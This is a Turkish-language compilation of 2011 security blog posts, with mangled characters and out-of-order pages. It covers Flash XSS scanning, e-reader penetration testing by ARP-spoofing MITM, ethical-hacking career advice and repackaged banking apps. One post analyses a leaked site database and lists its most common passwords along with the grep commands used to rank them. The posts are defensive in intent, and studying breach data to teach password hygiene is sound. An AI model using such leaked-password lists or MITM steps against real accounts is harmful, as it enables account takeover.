bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 22: Hack 4 Career - 2011

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

